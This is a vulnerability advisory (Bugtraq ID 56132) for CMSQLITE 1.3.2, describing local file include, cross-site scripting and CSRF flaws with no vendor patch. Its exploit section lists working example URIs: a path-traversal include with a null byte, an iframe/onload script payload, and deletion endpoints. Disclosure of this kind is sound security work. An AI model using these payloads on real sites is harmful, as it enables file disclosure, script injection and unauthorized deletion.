CMSQLITE Multiple Security Vulnerabilities
BID:56132
Info
CMSQLITE Multiple Security Vulnerabilities
| Bugtraq ID: | 56132 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 19 2012 12:00AM |
| Updated: | Oct 19 2012 12:00AM |
| Credit: | Katharina S.L |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
CMSQLITE Multiple Security Vulnerabilities
CMSQLITE is prone to multiple security vulnerabilities, including:
1. A local file-include vulnerability.
2. A cross-site scripting vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
Exploiting these vulnerabilities may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, to steal cookie-based authentication credentials, to view and execute local files within the context of the webserver process and disclose or modify sensitive information, or perform unauthorized actions. This may aid in launching further attacks.
CMSQLITE 1.3.2 is vulnerable; other versions may also be affected.
CMSQLITE is prone to multiple security vulnerabilities, including:
1. A local file-include vulnerability.
2. A cross-site scripting vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
Exploiting these vulnerabilities may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, to steal cookie-based authentication credentials, to view and execute local files within the context of the webserver process and disclose or modify sensitive information, or perform unauthorized actions. This may aid in launching further attacks.
CMSQLITE 1.3.2 is vulnerable; other versions may also be affected.
Exploit / POC
CMSQLITE Multiple Security Vulnerabilities
The following example URIs are available:
Local-file include:
http://www.exapmle.com/cmsqlite/admin/mediaAdmin.php?d=../darius.php+$[NEW PATH]%00
http://www.exapmle.com/cmsqlite/admin/mediaAdmin.php?d=darius.php+$[NEW PATH]%00
Cross-site scripting:
http://www.exapmle.com/cmsqlite/admin/mediaAdmin.php?id=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
Cross-site request-forgery:
http://www.exapmle.com/cmsqlite/admin/helper/deleteMenu.php
http://www.exapmle.com/cmsqlite/admin/helper/deleteArticle.php
http://www.exapmle.com/cmsqlite/admin/helper/deleteCategory.php
The following example URIs are available:
Local-file include:
http://www.exapmle.com/cmsqlite/admin/mediaAdmin.php?d=../darius.php+$[NEW PATH]%00
http://www.exapmle.com/cmsqlite/admin/mediaAdmin.php?d=darius.php+$[NEW PATH]%00
Cross-site scripting:
http://www.exapmle.com/cmsqlite/admin/mediaAdmin.php?id=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
Cross-site request-forgery:
http://www.exapmle.com/cmsqlite/admin/helper/deleteMenu.php
http://www.exapmle.com/cmsqlite/admin/helper/deleteArticle.php
http://www.exapmle.com/cmsqlite/admin/helper/deleteCategory.php
Solution / Fix
CMSQLITE Multiple Security Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
CMSQLITE Multiple Security Vulnerabilities
References:
References:
- CMSQlite Homepage (CMSQLite)
- CMSQLITE v1.3.2 - Multiple Web Vulnerabiltiies (Vulnerability Lab)